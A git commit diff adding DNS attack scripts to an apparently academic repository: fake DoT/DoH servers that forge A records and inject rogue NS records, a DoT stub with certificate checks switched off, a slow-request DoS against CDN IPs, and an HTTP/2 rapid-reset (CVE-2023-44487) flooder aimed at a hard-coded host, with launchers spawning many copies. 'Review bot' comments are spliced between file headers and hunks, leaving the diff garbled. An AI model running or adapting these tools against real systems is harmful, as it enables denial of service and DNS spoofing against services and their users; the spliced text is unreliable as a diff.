| author | modikai <[email protected]> | 2023-11-23 09:53:44 +0800 |
|---|---|---|
| committer | modikai <[email protected]> | 2023-11-23 09:53:44 +0800 |
| commit | 769eda62ff0190a74426b9eac3928d7e629c2002 (patch) | |
| tree | f21a20bb33689a0164f79ae78ed3e5ba40b0610e | |
| parent | f2732ae21338349a4d5e87835b87af7d22fa696c (diff) | |
| parent | 5e2681226f27af7fe85b4c1cc7f76879ec5be01e (diff) | |
Merge branch 'main' of https://git.mesalab.cn/handingkang/yydns
25 files changed, 672 insertions, 0 deletions
diff --git a/att script/10/.gitkeep b/att script/10/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/10/.gitkeep
diff --git a/att script/10/DoT数据篡改.pdf b/att script/10/DoT数据篡改.pdf
Binary files differ
new file mode 100644
index 0000000..d6acd8c
--- /dev/null
+++ b/att script/10/DoT数据篡改.pdf
diff --git a/att script/10/dot_stub.py b/att script/10/dot_stub.py
new file mode 100644
index 0000000..3c35dc7
--- /dev/null
+++ b/att script/10/dot_stub.py
@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+ # 接收DNS请求
+ data, addr = listener.recvfrom(1024)
+ #print(dns.message.from_wire(data))
+ data = dns.message.from_wire(data)
+ if 'baidu' in data.question.__str__():
+ # print(data)
+ # print(addr)
+ print('DNS请求:', data.question)
+ # # 创建TLS连接并发送DNS请求到上游服务器
+ resp = dns.query.tls(
+ q=data,
+ where=upstream_server,
+ timeout=10,
+ ssl_context=context)
+ print('DNS响应:', resp.answer)
+ # with socket.create_connection((upstream_server,853)) as sock:
+ # with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+ # tls_sock.sendall(data.to_wire())
+ # resp = tls_sock.recv(4096)
+
+ # 将上游服务器的响应发送回客户端
+ listener.sendto(resp.to_wire(), addr)
+ break
diff --git a/att script/10/fake_DoT.py b/att script/10/fake_DoT.py
new file mode 100644
index 0000000..4e45754
--- /dev/null
+++ b/att script/10/fake_DoT.py
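Review bot: `context.check_hostname = False` and `context.verify_mode = ssl.CERT_NONE` switch off all certificate validation on the upstream DoT connection, so this stub will accept whatever presents itself on 47.88.31.213:853 — that is precisely the client weakness the accompanying DoT write-ups depend on, and it deserves an explicit comment such as `# Certificate validation deliberately disabled: lab stub only, never reuse in a real resolver` instead of two bare assignments. The `--dot` argument is parsed and printed but never used, `upstream_server` is a hard-coded IP, and the `break` after the first forwarded `baidu` query means exactly one request is ever proxied. `dns.message.from_wire(data)` is applied to a raw UDP datagram with no exception handling, so a single malformed packet on 127.0.0.1:53 terminates the process. The same file is added verbatim as `att script/12/dot_stub.py`; keeping one copy avoids the two drifting apart.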
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async def handle_client(reader, writer):
+ request_data = await reader.read(1024)
+ request = dns.message.from_wire(request_data[2:])
+ #print(request)
+ dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+ dns_request.id = request.id
+ #print(dns_request)
+ dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+ #print(dns_response)
+ if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+ print('---tamper---', tamper)
+ dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+ if str(request.question[0].name) == inject:
+ print('---inject---', inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+
+ response_data = dns_response
+ record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+ # 构建完整的TLS响应数据
+ tls_response_data = record_header + response_data.to_wire()
+ writer.write(tls_response_data)
+ await writer.drain()
+ writer.close()
+
+async def start_server():
+ # 配置服务器参数
+ listen_address = '0.0.0.0'
+ listen_port = 853
+ CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
+ KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
+ context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+ # 创建TCP服务器
+ server = await asyncio.start_server(
+ handle_client, listen_address, listen_port, ssl=context)
+
+ print(f'DoT server listening on {listen_address}:{listen_port}')
+ async with 
server:
+ await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server())
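Review bot: `request_data[2:]` drops the two-byte DNS-over-TCP length prefix without comparing it to what `reader.read(1024)` actually returned, so when the prefix and the payload length disagree the truncated bytes go straight into `dns.message.from_wire` and the handler raises instead of answering; read the prefix, `msg_len = int.from_bytes(request_data[:2], 'big')`, and reject the request when `len(request_data) - 2 != msg_len`. `dns.rdataclass` and `dns.rdatatype` are used but never imported — this only works because `dns.message` imports them transitively — while `socket`, `dns.flags`, the duplicated `import dns.message` and `from dnslib import DNSRecord` are unused, the last one pulling in a third-party package for nothing. `writer.close()` is not followed by `await writer.wait_closed()`, so the TLS shutdown is never awaited. A module docstring saying that this is a lab fixture that only functions when the client has been made to trust the certificate at `CERT_FILE` (the control the DoT write-up is demonstrating) would help the next reader. The same file is added verbatim as `att script/12/fake_DoT.py`.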
\ No newline at end of file
diff --git a/att script/11/.gitkeep b/att script/11/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/11/.gitkeep
diff --git a/att script/11/DoH数据注入.pdf b/att script/11/DoH数据注入.pdf
Binary files differ
new file mode 100644
index 0000000..803611c
--- /dev/null
+++ b/att script/11/DoH数据注入.pdf
diff --git a/att script/11/fake_DoH.py b/att script/11/fake_DoH.py
new file mode 100644
index 0000000..02f3829
--- /dev/null
+++ b/att script/11/fake_DoH.py
@@ -0,0 +1,63 @@
+import argparse
+import base64
+import ssl
+import dns.asyncquery
+import dns.rcode
+import aiohttp
+import dns.message
+import dns.rrset
+from aiohttp import web
+
+DNS_SERVER_ADDRESS = '223.5.5.5'
+DNS_SERVER_PORT = 53
+
+async def doh_handler(request):
+ if request.method == "GET":
+ rquery = str(request.query).split(' ')[1]
+ #print(rquery)
+ rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
+ doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
+ else:
+ try:
+ doh_request = dns.message.from_wire(await request.read())
+ except :
+ return web.Response(text='Invalid DNS request', status=400)
+
+ dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
+ dns_request.id = doh_request.id
+ # 发起DNS请求
+ dns_response = await dns.asyncquery.udp(q = dns_request, port=DNS_SERVER_PORT, where=DNS_SERVER_ADDRESS)
+ #print(dns_response)
+
+ if str(doh_request.question[0].name) == tamper and int(doh_request.question[0].rdtype)==1:
+ print('---tamper---',tamper)
+ dns_response.answer = [ dns.rrset.from_text(tamper,3600,dns.rdataclass.IN, dns.rdatatype.A,'39.106.44.126')]
+ if str(doh_request.question[0].name) == inject:
+ print('---inject---',inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+ # 构建HTTPS响应
+ response = web.Response(body=dns_response.to_wire())
+ response.content_type = 'application/dns-message'
+ return response
+
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+#print('tamper:',tamper)
+DOH_SERVER_URL = "https://dns.alidns.com/dns-query"
+CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt"
+KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key"
+ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ssl_context.load_cert_chain(CERT_FILE, KEY_FILE)
+app = web.Application()
+app.router.add_get(path='/dns-query',handler=doh_handler)
+app.router.add_post(path='/dns-query',handler=doh_handler)
+web.run_app(app, host='127.0.0.1', port=8444, ssl_context=ssl_context)
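Review bot: the bare `except :` around `dns.message.from_wire(await request.read())` catches everything, including `asyncio.CancelledError` and `KeyboardInterrupt`, and reports all of it as a client-side 400; narrow it to the parser's own failure, `except dns.exception.DNSException:` (with `import dns.exception` added at the top). The GET branch's `str(request.query).split(' ')[1]` picks the parameter out of the repr of aiohttp's MultiDict rather than reading it by name, which is fragile and silently returns the wrong field if the query string carries anything other than a single `dns` parameter. `aiohttp` (as a bare import) and `dns.rcode` are unused and `DOH_SERVER_URL` is assigned but never read. The same file is added verbatim as `att script/9/fake_DoH.py`; one shared copy would avoid the two drifting apart.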
\ No newline at end of file
diff --git a/att script/12/.gitkeep b/att script/12/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/12/.gitkeep
diff --git a/att script/12/DoT数据注入.pdf b/att script/12/DoT数据注入.pdf
Binary files differ
new file mode 100644
index 0000000..eec7498
--- /dev/null
+++ b/att script/12/DoT数据注入.pdf
diff --git a/att script/12/dot_stub.py b/att script/12/dot_stub.py
new file mode 100644
index 0000000..3c35dc7
--- /dev/null
+++ b/att script/12/dot_stub.py
@@ -0,0 +1,45 @@
+import socket
+import ssl
+import dns.message
+import dns.query
+import dns.rcode
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-dot', '--dot', default='dns.alidns.com')
+args = parser.parse_args()
+print(f'DoT server: {args.dot}')
+upstream_server = '47.88.31.213'
+
+# 创建监听socket
+listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+listener.bind(('127.0.0.1', 53))
+
+# 创建TLS连接
+context = ssl.create_default_context()
+context.check_hostname = False
+context.verify_mode = ssl.CERT_NONE
+while True:
+ # 接收DNS请求
+ data, addr = listener.recvfrom(1024)
+ #print(dns.message.from_wire(data))
+ data = dns.message.from_wire(data)
+ if 'baidu' in data.question.__str__():
+ # print(data)
+ # print(addr)
+ print('DNS请求:', data.question)
+ # # 创建TLS连接并发送DNS请求到上游服务器
+ resp = dns.query.tls(
+ q=data,
+ where=upstream_server,
+ timeout=10,
+ ssl_context=context)
+ print('DNS响应:', resp.answer)
+ # with socket.create_connection((upstream_server,853)) as sock:
+ # with context.wrap_socket(sock, server_hostname=upstream_server[0]) as tls_sock:
+ # tls_sock.sendall(data.to_wire())
+ # resp = tls_sock.recv(4096)
+
+ # 将上游服务器的响应发送回客户端
+ listener.sendto(resp.to_wire(), addr)
+ break
diff --git a/att script/12/fake_DoT.py b/att script/12/fake_DoT.py
new file mode 100644
index 0000000..4e45754
--- /dev/null
+++ b/att script/12/fake_DoT.py
@@ -0,0 +1,63 @@
+import argparse
+import asyncio
+import ssl
+import socket
+import dns.asyncquery
+import dns.message
+import dns.rcode
+import dns.flags
+import dns.message
+import dns.rrset
+from dnslib import DNSRecord
+
+async def handle_client(reader, writer):
+ request_data = await reader.read(1024)
+ request = dns.message.from_wire(request_data[2:])
+ #print(request)
+ dns_request = dns.message.make_query(request.question[0].name, request.question[0].rdtype)
+ dns_request.id = request.id
+ #print(dns_request)
+ dns_response = await dns.asyncquery.udp(q=dns_request, port=53, where='223.5.5.5')
+ #print(dns_response)
+ if str(request.question[0].name) == tamper and int(request.question[0].rdtype) == 1:
+ print('---tamper---', tamper)
+ dns_response.answer = [dns.rrset.from_text(tamper, 3600, dns.rdataclass.IN, dns.rdatatype.A, '39.106.44.126')]
+ if str(request.question[0].name) == inject:
+ print('---inject---', inject)
+ dns_response.additional = [dns.rrset.from_text(inject,3600,dns.rdataclass.IN, dns.rdatatype.NS,'ns.'+inject.split('.',1)[1]),
+ dns.rrset.from_text('ns.'+inject.split('.',1)[1],3600,dns.rdataclass.IN, dns.rdatatype.A,ns)]
+ #print(dns_response)
+
+ response_data = dns_response
+ record_header = len(response_data.to_wire()).to_bytes(2, 'big')
+ # 构建完整的TLS响应数据
+ tls_response_data = record_header + response_data.to_wire()
+ writer.write(tls_response_data)
+ await writer.drain()
+ writer.close()
+
+async def start_server():
+ # 配置服务器参数
+ listen_address = '0.0.0.0'
+ listen_port = 853
+ CERT_FILE = "/usr/local/etc/unbound/cert_new4/app.crt" # 替换为你的SSL证书文件路径
+ KEY_FILE = "/usr/local/etc/unbound/cert_new4/app.key" # 替换为你的SSL密钥文件路径
+ context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
+ context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
+ # 创建TCP服务器
+ server = await asyncio.start_server(
+ handle_client, listen_address, listen_port, ssl=context)
+
+ print(f'DoT server listening on {listen_address}:{listen_port}')
+ async with 
server:
+ await server.serve_forever()
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-tamper', '--tamper', default='')
+parser.add_argument('-inject', '--inject', default='')
+parser.add_argument('-ns', '--ns', default='39.106.44.126')
+args = parser.parse_args()
+tamper = args.tamper +'.'
+inject = args.inject +'.'
+ns = args.ns
+asyncio.run(start_server())
\ No newline at end of file
diff --git a/att script/7/.gitkeep b/att script/7/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/7/.gitkeep
diff --git a/att script/7/att_pending_cookie.py b/att script/7/att_pending_cookie.py
new file mode 100644
index 0000000..ce3e4de
--- /dev/null
+++ b/att script/7/att_pending_cookie.py
@@ -0,0 +1,127 @@
+import argparse
+import http.client
+import asyncio
+import base64
+import random
+import secrets
+import string
+from collections import Counter
+import sys
+import time
+import requests
+import dns.message
+import httpx
+import gzip
+import io
+import pandas as pd
+import tqdm
+from concurrent.futures import ThreadPoolExecutor
+import threading
+from dns.message import make_query
+
+def ge_cookie():
+ cookie = ""
+ for i in range(200):
+ cookie += ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(4, 10)))+\
+ "="''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 20)))+"; "
+ cookie = cookie[:-2]
+ #print(sys.getsizeof(cookie)/1024)
+ return cookie
+
+def send_request(event,url,t,latency,stime):
+ cookie = ge_cookie()
+ headers = {"content-type": "application/dns-message",
+ "accept": "application/dns-message",
+ "Surrogate-Control": "max-age=0", "Cache-Control": "max-age=0",
+ "Cookie":cookie}
+ message = dns.message.make_query(base64.b64encode(url.encode("utf-8")).decode("utf-8") +
+ ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))+ ".google.com", "A")
+ message.flags |= dns.flags.RD
+ dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
+ # time.sleep(t*2)
+ conn = http.client.HTTPConnection(url, port=80)
+
+
+ #time.sleep(3)
+ body = ','.join([f'{name}: {value}' for name, value in headers.items()])
+ request_line = "GET /dns-query?dns=" + f"{dns_req} HTTP/1.1\r\n"
+ conn.send(request_line.encode())
+ headers0 = {'host': 'www.doeresearch.site'}
+ headers0 = ''.join([f'{name}: {value}\r\n' for name, value in headers0.items()])
+ conn.send(headers0.encode())
+
+ #time.sleep(10)
+ #body = str(make_query(qname="baidu.com", rdtype="A", want_dnssec=False))
+ #print(body)
+ #print(len(body))
+ chunk_size = 20 # 每个块的大小
+ for i in range(0, len(body), chunk_size):
+ #print(i,'------------------')
+ chunk = body[i:i + 
chunk_size]
+ conn.send(f'{chunk}'.encode())
+ start_time = time.perf_counter()
+ while time.perf_counter() - start_time < 0.002:
+ pass
+ # print('P')
+ conn.send(b'\r\n')
+ # 发送结束标志
+ #print(url, t, 'pending')
+ desired_time = latency / 2000 # 将毫秒转换为秒
+ #conn.close()
+ #time.sleep(10)
+ event.wait()
+ # start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < desired_time:
+ # pass
+ #conn.send(b'0\r\n\r\n')
+ conn.send(b'\r\n')
+ # Get the response
+ #response = conn.getresponse()
+ # print(response.status, response.reason)
+ #print(response.read())
+ # print(dns.message.from_wire(response.read()))
+
+ #conn.close()
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-stime', '--stime')
+ parser.add_argument('-round', '--round',default=10)
+ parser.add_argument('-wait', '--wait',default=180)
+ args = parser.parse_args()
+
+
+ path = '/root/Nora/cdn/'
+ #path = 'D:\Volumes\调研\项目\YYDNS\GJ\DDOS/'
+ df = pd.read_csv(path+'fastly_att.csv',nrows=64)
+ data = df.set_index('ip')['latency'].to_dict()
+ event = threading.Event()
+ s_time = time.time()
+ #stime = time.perf_counter()
+ stime = float(args.stime)
+ round = int(args.round)
+ wait_time = int(args.wait)
+ threads = []
+ for i in range(round):
+ for ip, latency in data.items():
+ t = threading.Thread(target=send_request, args=(event,ip, i, latency,stime))
+ t.start()
+ threads.append(t)
+ #time.sleep(latency)
+ start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < 0.1:
+ # pass
+ print('all waiting')
+ while time.perf_counter() - stime < wait_time:
+ pass
+ # 触发事件,同时释放所有线程
+ event.set()
+ # 等待所有线程完成
+ for t in threads:
+ t.join()
+ print('ATT over:',time.time() - s_time)
+ #for i in tqdm.tqdm(range(1000)):
+ #send_request("151.101.76.204",0,0,0)
+
+
+
diff --git a/att script/7/start_pending.py b/att script/7/start_pending.py
new file mode 100644
index 0000000..5e7edf0
--- /dev/null
+++ b/att script/7/start_pending.py
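Review bot: `--stime` is declared with no default and then used unconditionally as `float(args.stime)`, so running the script without `-stime` dies with `TypeError: float() argument must be a string or a real number, not 'NoneType'` instead of a usage message; declare it `parser.add_argument('-stime', '--stime', type=float, required=True)` and give `-round`/`-wait` `type=int` so bad values are rejected by argparse rather than by the later casts. `round` shadows the builtin, `dns.flags` is referenced although only `dns.message` is imported, and in `send_request` the parameters `t` and `stime` plus the locals `desired_time` and the outer `start_time` appear to be assigned but never read. A large share of the imports (`asyncio`, `secrets`, `Counter`, `sys`, `requests`, `httpx`, `gzip`, `io`, `tqdm`, `ThreadPoolExecutor`, `make_query`) are unused, which makes the script depend on three third-party packages for nothing. The CSV path `/root/Nora/cdn/fastly_att.csv` and the `host` header value are hard-coded and there is no module docstring describing the expected `ip` and `latency` columns, so the file cannot be understood or run outside the author's machine.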
@@ -0,0 +1,20 @@
+import os
+import argparse
+import time
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-n', '--n', default=3)
+parser.add_argument('-round', '--round', default=5)
+parser.add_argument('-wait', '--wait', default=150)
+args = parser.parse_args()
+stime = time.perf_counter()
+round = int(args.round)
+wait_time = int(args.wait)
+for i in range(int(args.n)):
+ #print(f"python3 cve44487.py -s {i}")
+ os.popen(f"python att_pending_cookie.py -stime {stime} -round {round} -wait {wait_time}")
+while True:
+ current_time = time.perf_counter()
+ elapsed_time = current_time - stime
+ print(f"经过的时间:{elapsed_time:.2f}秒", end="\r")
+ time.sleep(1) # 暂停一秒钟
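Review bot: `os.popen(f"python att_pending_cookie.py ...")` starts each worker through a shell string and discards the returned object, so the parent keeps no handle to its children: the `while True` loop that follows can only be left with Ctrl-C, and the workers keep running after the parent is gone. Prefer `subprocess.Popen([sys.executable, 'att_pending_cookie.py', '-stime', str(stime), '-round', str(round), '-wait', str(wait_time)])`, keep the `Popen` objects in a list, and terminate and wait on them in a `finally:` around the loop. `round` shadows the builtin, and `-n`/`-round`/`-wait` carry integer defaults but no `type=int`, so a non-numeric value fails in the `int(...)` casts instead of at argparse. `att script/8/start_reset_att.py` spawns `cve44487.py` with the same `os.popen` pattern and the same missing `type=int`.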
\ No newline at end of file
diff --git a/att script/7/脉冲拒绝服务.pdf b/att script/7/脉冲拒绝服务.pdf
Binary files differ
new file mode 100644
index 0000000..9f938c9
--- /dev/null
+++ b/att script/7/脉冲拒绝服务.pdf
diff --git a/att script/8/.gitkeep b/att script/8/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/8/.gitkeep
diff --git a/att script/8/HTTP2快速重置拒绝服务.pdf b/att script/8/HTTP2快速重置拒绝服务.pdf
Binary files differ
new file mode 100644
index 0000000..b9198d5
--- /dev/null
+++ b/att script/8/HTTP2快速重置拒绝服务.pdf
diff --git a/att script/8/cve44487.py b/att script/8/cve44487.py
new file mode 100644
index 0000000..5154f06
--- /dev/null
+++ b/att script/8/cve44487.py
@@ -0,0 +1,152 @@
+import random
+import ssl
+import string
+import sys
+import csv
+import socket
+import argparse
+import time
+import dns.message
+from datetime import datetime
+from urllib.parse import urlparse
+from http.client import HTTPConnection, HTTPSConnection
+import base64
+from dns.message import make_query
+import tqdm
+from h2.connection import H2Connection
+from h2.config import H2Configuration
+import h2.events
+import httpx
+import requests
+import asyncio
+import warnings
+
+warnings.filterwarnings("ignore")
+async def multi_h2(id_start,conn,h2_conn,host,dns_req):
+ for stream_id in tqdm.tqdm(range(id_start,id_start+1000000,2)):
+ #print('stream_id',stream_id)
+ headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
+ (':path', '/dns-query' + '?dns=' + dns_req),
+ ("accept", "application/dns-message"),
+ ("content-type", "application/dns-message")]
+ #print(headers)
+ h2_conn.send_headers(stream_id, headers)
+ conn.send(h2_conn.data_to_send())
+
+ h2_conn.reset_stream(stream_id)
+ conn.send(h2_conn.data_to_send())
+
+
+
+
+def send_rst_stream_h2(host, sid,port=443, uri_path='/dns-query', timeout=5, proxy=None):
+ """
+ Send an RST_STREAM frame to the given host and port.
+ Parameters:
+ host (str): The hostname.
+ port (int): The port number.
+ stream_id (int): The stream ID to reset.
+ uri_path (str): The URI path for the GET request.
+ timeout (int): The timeout in seconds for the socket connection.
+ proxy (str): The proxy URL, if any.
+ Returns:
+ tuple: (status, message)
+ status: 1 if successful, 0 if no response, -1 otherwise.
+ message: Additional information or error message.
+ """
+
+ body = make_query(qname="baidu.com", rdtype="A", want_dnssec=False).to_wire()
+
+ #try:
+ # Create an SSL context to ignore SSL certificate verification
+ ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
+ ssl_context.options |= (
+ ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
+ )
+ ssl_context.options |= ssl.OP_NO_COMPRESSION
+ ssl_context.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:DHE+CHACHA20")
+ ssl_context.set_alpn_protocols(['h2'])
+ ssl_context.check_hostname = False
+ ssl_context.verify_mode = ssl.CERT_NONE
+
+ # Create a connection based on whether a proxy is used
+ conn = HTTPSConnection(host, port, timeout=timeout, context=ssl_context)
+ conn.connect()
+ #time.sleep(2)
+ # Initiate HTTP/2 connection
+ config = H2Configuration(client_side=True)
+ h2_conn = H2Connection(config=config)
+ h2_conn.initiate_connection()
+ conn.send(h2_conn.data_to_send())
+ #time.sleep(2)
+ # Send GET request headers
+ #time.sleep(2)
+ # Listen for frames and send RST_STREAM when appropriate
+ #print(sid)
+ flag = 0
+ s_time = time.time()
+ #for stream_id in tqdm.tqdm(range(sid*999999,sid*999999+1000000,2)):
+ for stream_id in range(sid * 999999, sid * 999999 + 200000, 2):
+ # flag += 1
+ # if time.time()-s_time>1:
+ # print(flag)
+ # break
+ # if flag>50:
+ # data = conn.sock.recv(65535)
+ # start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < 0.1:
+ # pass
+ #flag = 0
+ #print('stream_id',stream_id)
+ suff = base64.b64encode(str(stream_id).encode("utf-8")).decode("utf-8")+ ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
+ message = dns.message.make_query(f"{suff}.www.baidu.com", "A")
+ message.flags |= dns.flags.RD
+ dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
+
+ headers = [(':method', 'GET'), (':authority', host), (':scheme', 'https'),
+ (':path', uri_path + '?dns=' + dns_req),
+ ("accept", "application/dns-message"),
+ 
("content-type", "application/dns-message")]
+
+ # headers = [(':method', 'POST'), (':authority', host), (':scheme', 'https'),
+ # (':path', uri_path),
+ # ("accept", "application/dns-message"),
+ # ("content-type", "application/dns-message")]
+ #print(headers)
+ h2_conn.send_headers(stream_id, headers)
+ conn.send(h2_conn.data_to_send())
+ # h2_conn.send_data(stream_id, body)
+ # conn.send(h2_conn.data_to_send())
+ h2_conn.end_stream(stream_id)
+ conn.send(h2_conn.data_to_send())
+ # data = conn.sock.recv(100)
+ # events = h2_conn.receive_data(data)
+ # print('events:\n', events)
+ # start_time = time.perf_counter()
+ # while time.perf_counter() - start_time < 0.05:
+ # pass
+ h2_conn.reset_stream(stream_id)
+ conn.send(h2_conn.data_to_send())
+
+
+ #break
+ conn.close()
+ return ("over")
+ # except Exception as e:
+ # print('error------------')
+ # return (-1, f"send_rst_stream_h2 ---- {e}")
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-s', '--sid',default=1)
+ args = parser.parse_args()
+
+ targets = ["8.218.236.77"]
+ #targets = ['108.61.195.177']
+ for i in targets:
+
+ now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+ print(now,f"Checking {i}...", file=sys.stderr)
+ send_rst_stream_h2(i,int(args.sid))
+ #print("send rst stream:", resp, err2)
+
diff --git a/att script/8/start_reset_att.py b/att script/8/start_reset_att.py
new file mode 100644
index 0000000..b61fc2d
--- /dev/null
+++ b/att script/8/start_reset_att.py
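Review bot: the docstring on `send_rst_stream_h2` no longer matches the function it sits on: it documents a `stream_id` parameter the signature does not have (the parameter is `sid`), a `proxy` parameter that is accepted but never read, and a `(status, message)` tuple return, while the body returns the bare string `"over"` and the `try/except` that produced the `-1` case is commented out. Either restore the documented contract or rewrite the docstring to describe what the code now does (`sid` selects the stream-id range, the return value is the constant `"over"`, `proxy` is ignored); the comment `# Create a connection based on whether a proxy is used` above an unconditional `HTTPSConnection(...)` is stale for the same reason. `multi_h2` is declared `async` but contains no `await` and is never called, `body`, `flag` and `s_time` are computed and unused, `dns.flags` is referenced without being imported, and `csv`, `socket`, `urlparse`, `HTTPConnection`, `h2.events`, `httpx`, `requests` and `asyncio` are dead imports. `warnings.filterwarnings("ignore")` at import time silences every warning from `ssl`, `h2` and `dns` for the whole process, including deprecation warnings the lab would want to see; scope it with `warnings.catch_warnings()` or drop it. A module docstring stating that `targets` is the lab host from the HTTP2 write-up and that the script is a reproduction fixture would help whoever reads this later.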
@@ -0,0 +1,26 @@
+import argparse
+import os
+import time
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-n', '--n', default=1)
+args = parser.parse_args()
+
+streams = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19,21,23,25,27,29,31]
+for i in streams[:int(args.n)]:
+ #print(f"python3 cve44487.py -s {i}")
+ os.popen(f"python cve44487.py -s {i}")
+
+# for j in range(100):
+# for i in streams[:int(args.n)]:
+# # #print(f"python3 cve44487.py -s {i}")
+# os.popen(f"python cve44487.py -s {i}")
+# start_time = time.perf_counter()
+# while time.perf_counter() - start_time < 0.1:
+# pass
+# for i in streams[int(args.n):]:
+# # #print(f"python3 cve44487.py -s {i}")
+# os.popen(f"python cve44487.py -s {i}")
+# start_time = time.perf_counter()
+# while time.perf_counter() - start_time < 1:
+# pass
\ No newline at end of file
diff --git a/att script/9/.gitkeep b/att script/9/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/9/.gitkeep
diff --git a/att script/9/10/.gitkeep b/att script/9/10/.gitkeep
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/att script/9/10/.gitkeep
diff --git a/att script/9/DoH数据篡改.pdf b/att script/9/DoH数据篡改.pdf
Binary files differ
new file mode 100644
index 0000000..a5237fa
--- /dev/null
+++ b/att script/9/DoH数据篡改.pdf
diff --git a/att script/9/fake_DoH.py b/att script/9/fake_DoH.py
new file mode 100644
index 0000000..02f3829
--- /dev/null
+++ b/att script/9/fake_DoH.py
@@ -0,0 +1,63 @@
+import argparse
+import base64
+import ssl
+import dns.asyncquery
+import dns.rcode
+import aiohttp
+import dns.message
+import dns.rrset
+from aiohttp import web
+
+DNS_SERVER_ADDRESS = '223.5.5.5'
+DNS_SERVER_PORT = 53
+
+async def doh_handler(request):
+ if request.method == "GET":
+ rquery = str(request.query).split(' ')[1]
+ #print(rquery)
+ rquery = rquery.ljust(len(rquery) + len(rquery) % 4, "=")
+ doh_request = dns.message.from_wire(base64.b64decode(rquery.encode("UTF8")))
+ else:
+ try:
+ doh_request = dns.message.from_wire(await request.read())
+ except :
+ return web.Response(text='Invalid DNS request', status=400)
+
+ dns_request = dns.message.make_query(doh_request.question[0].name, doh_request.question[0].rdtype)
+ dns_request.id = doh_request.id
+ # 发起DNS请求
